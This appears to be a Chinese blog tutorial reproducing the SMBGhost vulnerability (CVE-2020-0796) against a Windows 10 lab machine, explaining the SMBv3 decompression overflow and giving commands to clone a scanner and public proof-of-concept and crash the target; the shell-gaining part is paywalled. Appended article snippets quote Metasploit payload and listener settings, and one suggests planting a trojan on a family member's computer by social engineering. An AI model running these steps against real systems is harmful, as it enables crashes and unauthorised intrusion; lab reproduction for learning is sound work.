Win10-永恒之黑漏洞复现

最新推荐文章于 2025-09-19 03:41:09 发布
原创 最新推荐文章于 2025-09-19 03:41:09 发布 · 5k 阅读 · 87 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#windows #网络安全

本文详细描述了Windows10上的SMB远程代码执行漏洞(CVE-2020-0796)利用方法,涉及SMBGhost工具的扫描和攻击,以及getshell过程,包括蓝屏攻击和通过Meterpreter获取shell的步骤。

环境准备:win10(驱动版本10.0.18362.1)靶机、kali攻击机

漏洞介绍:

        2020年3月,微软公布SMB远程代码执行漏洞(CVE-2020-0796)又称“永恒之黑”,该漏洞由SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。

漏洞原理:

        SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。攻击者利用该漏洞无须权限即可实现远程代码执行,受黑客攻击的目标系统只需开机在线即可能被入侵。

        Windows 10和Windows Server 2016引入了SMB 3.1.1 。本次漏洞源于SMBv3没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。

        利用该漏洞,黑客可直接远程攻击SMB服务端远程执行任意恶意代码,亦可通过构建恶意SMB服务端诱导客户端连接从而大规模攻击客户端。

影响版本:

Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows Server,Version 1903 (Server Core installation)
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows Server,Version 1909(Server Core installation)

目录

一、蓝屏攻击

二、getshell

一、蓝屏攻击

🌂下载工具

git clone https://github.com/ollypwn/SMBGhost.git

🌂进入工具目录下,进行扫描,出现下图字样即为存在漏洞

python3 scanner.py 靶机ip

🌂下载工具,进入目录,对靶机进行攻击

git clone https://github.com/eerykitty/CVE-2020-0796-PoC.git
python3 CVE-2020-0796.py 靶机ip

PS:缺少ntlm_auth模块,使用python3 -m pip install ntlm_auth,进行下载后再执行

🌂查看靶机,蓝屏

 

二、getshell

最低0.47元/天 解锁文章
【权限提升】 Windows10 本地提权漏洞复现及详细分析(CVE-2021-1732)
李同學的安全圈
12-07 5568
CVE-2021-1732 是蔓灵花(BITTER)APT 组织在某次被披露的攻击行动中使用的 0day 漏洞,该高危漏洞可以在本地将普通用户进程的权限提升至最高的 。属于windows系统级别的二进制漏洞
永恒-CVE-2020-0796
09-19
永恒漏洞复现最详解
win10永恒漏洞复现
bmxch的博客
02-01 1668
漏洞检测 检测工具:https://github.com/ollypwn/SMBGhost 先下载 git clone https://github.com/ollypwn/SMBGhost 进入工具目录 cd SMBGhost/ 用python3调用scanner.py python3 scanner.py 192.168.28.135 靶机192.168.28.135自身确实存在漏洞漏洞攻击 poc:https://github.com/eerykitty/CVE-2020-0796-PoC 先获
永恒_CVE-2020-0796最详细复现方法
最新发布
2202_75728825的博客
09-19 712
摘要:本文介绍了针对Windows 10 1909版本的SMB远程代码执行漏洞(CVE-2020-0796)的攻防实验。该漏洞源于SMBv3协议处理压缩数据包时的安全检查缺失,可导致远程任意代码执行。实验环境包括Windows 10靶机和Kali攻击机,使用多个开源POC工具进行漏洞检测和利用,通过生成恶意载荷、建立监听会话最终获取系统权限。文章详细说明了虚拟环境配置、漏洞扫描、载荷生成和会话建立等关键步骤,并提供了应对蓝屏问题的配置建议。该漏洞影响多个Windows 10和Server 2016版本。
Kali MSF攻击Win10
nlj1860453的博客
01-05 1953
如果没有问题,它会打开监听,现在我们在Windows上运行木马文件,Windows如果没有任何反应,只是鼠标转圈圈,MSF输出了“meterpreter>“字样的时候,攻击就成功了!运行后就可以看到此路径下有一个叫“shell.exe”的可执行文件,把他拖到Windows上(实际情况是我爸的电脑,可以使用社会工程学上传上去),这一步就大功告成了!我Windows的IP是192.168.1.1*,我kali的IP是192.168.1.*。如果你的虚拟机是VM虚拟机,那么你下载VM图标的,其它虚拟机以此类推。
利用kali对Windows进行msf渗透(详细介绍)
2302_78587828的博客
09-17 2402
msfencode.是用来生成后门的软件。MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。msfvenom支持多种操作系统和架构,包括Windows、Linux、macOS以及各种CPU架构。它可以生成各种类型的恶意软件,如反向连接和绑定Shell、Meterpreter反弹Shell、恶意文档、木马等。
用kali渗透Windows
m0_61680503的博客
04-13 729
运用kali渗透Windows系统打开摄像头和截图
Windows10-CVE-2020-0796漏洞复现
m0_73895181的博客
08-08 609
4.输入如下命令use exploit/multi/handlerset payload windows/x64/meterpreter/bind_tcpset lport4444set rhost 目标ip地址run这时候,只要靶机运行了该木马病毒,即可被控制,我们可以通过终端操作此电脑ps:有可能出现编码错误的情况,些许字符可能会变成未知符号。
CVE-2020-0796 WIN10 永恒漏洞复现
干铮的博客
08-14 1820
1.禁用windows update 2.关闭windows防火墙 3.主机发现 Vulnerable 代表易攻击 也可以把ip改为 10.3.139.0/24扫描网段 4.用msfvenom生成python类型的shellcode 5.复制所有值,然后将buf替换成USER_PAYLOAD,然后粘贴到exp文件中替换掉之前的 6.MSF监听4444端口 use exploit/multi/handler set payload windows/x64...
Kali--永恒之蓝漏洞复现
f1245179815的博客
10-24 1327
该模块用于发现被漏洞影响的 Windows主机,以及执行命令,可以通过提供的选项进行数据包分析,或可选通道溢出使用,以获得远程命令执行的权限。该模块用于发现被漏洞影响的 Windows主机,以及执行命令,可以通过提供的选项进行数据包分析,或可选通道溢出使用,以获得远程命令执行的权限。该模块用于利用MS17-010漏洞实现远程执行代码,可以覆盖掉目标计算机的内存地址,从而实现攻击者的恶意代码在被攻击计算机上的执行。当目标机开机,程序后台运行,且监听端口为7777,这个端口可以自己设置。
Kali:简单实现永恒复现漏洞CVE-2020-0796
2201_75638644的博客
03-12 3527
Kali:简单实现永恒复现漏洞CVE-2020-0796,2017年时微软爆出了高危漏洞——永恒之蓝,3年后微软又爆出了一个继永恒之蓝的高危漏洞——永恒,该漏洞所瞄准的服务都是SMB服务。这些漏洞现在都只能是做为初始kali渗透玩家的最基础攻击教程的素材,也只是来用于了解一下基础知识和这么一个使用流程。永恒(CVE-2020-0796)是一种影响Windows 10版本1903和1909的漏洞,存在于SMBv3协议中。其他版本的Windows操作系统不受此漏洞影响。
WIN10永恒CVE-2020-0796漏洞复现获取getshell(未成功)可蓝屏
qq_35258210的博客
02-03 1842
exploit:https://codechina.youkuaiyun.com/mirrors/chompie1337/SMBGhost_RCE_PoC?utm_source=csdn_github_accelerator 目标主机 把防火墙关了 关闭后可以ping通之后 连接反向木马 msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python 看到buf=。。。。这些编码全部复制下.
windows10 永恒复现(CVE-2020-0796)
qq_53579360的博客
11-13 1802
永恒复现
永恒复现
qq_67181251的博客
05-07 2976
二进制漏洞是可执行文件(PE、ELF文件等)因编码时考虑不周,造成的软件执行了非预期的功能。由于二进制漏洞大都涉及到系统层面,所以危害程度比较高。比如经典的office栈溢出漏洞(CVE-2012-0158)、(CVE-2017-11882)以及(CVE-2017-11882)的补丁绕过漏洞(CVE-2018-0802)等,都是危险程度极高的0day和1day漏洞。栈溢出漏洞(Stack-Overflow)堆溢出漏洞(Heap-Overflow)释放后重引用漏洞(Use-After-Free)
漏洞复现】CVE-2020-0796永恒漏洞复现
weixin_67698311的博客
06-18 3056
Windows 10Windows Server 2016引入了SMB 3.1.1.本次漏洞源于SMBv3没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。3.使用工具检查靶机是否存在漏洞,检查工具下载地址https://github.com/ollypwn/SMBGhost运行结果如下图,证明靶机存在漏洞,Vulnerable代表目标存在漏洞,可以进行攻击!4.通过IP安全策略屏蔽危险端口,bat执行添加防火墙策略,关闭危险服务。
永恒【CVE-2020-0796】漏洞详细复现
2301_81807686的博客
10-19 1520
漏洞后来被确认为 CVE-2020-0796,也被称为 “smbghost” 或 “永恒”。该漏洞存在于 srv2.sys 文件中,由于 SMBv3 没有正确处理压缩的数据包,在解压数据包时使用客户端传过来的长度进行解压,却没有检查长度是否合法,最终导致整数溢出。之后记得要将win10的防火墙关闭(我这的win10和kail都是NAT模式)在CVE-2020-0796-PoC目录下打开,查看目录下的文件,通过ls命令。准备一个有漏洞win10,下载链接。测试漏洞(ip为win10ip)
CVE-2020-0796永恒漏洞复现 超详细过程(成功复现
热门推荐
unlash的博客
10-20 1万+
CVE-2020-0796永恒漏洞复现 超详细过程 成功复现 msf监听成功反弹shell 漏洞描述 影响版本 修复建议
永恒渗透win10
yy1024iy的博客
05-30 2754
这篇文章介绍了一种名为永恒的高级网络攻击工具,它利用微软Windows系统漏洞实现远程控制、篡改和窃取数据。文章详细描述了在攻击Win10计算机中使用永恒的操作步骤。与常规渗透攻击相比,永恒更加难以防御,这也让用户在保护自己计算机安全时需要更重视网络安全并定期更新系统和软件。
          永恒漏洞复现
Zhaokangkang123的博客
02-15 1350
永恒漏洞复现
msf win10漏洞_永恒:CVE20200796漏洞复现
05-28
如果您想要了解如何复现 CVE-2020-0796(也称为“永恒漏洞),我可以为您提供一些指导。 首先,您需要具备一定的渗透测试技能和经验,因为该漏洞需要进行端口扫描、漏洞利用等操作,属于比较高级的渗透测试...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

学习的小白_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值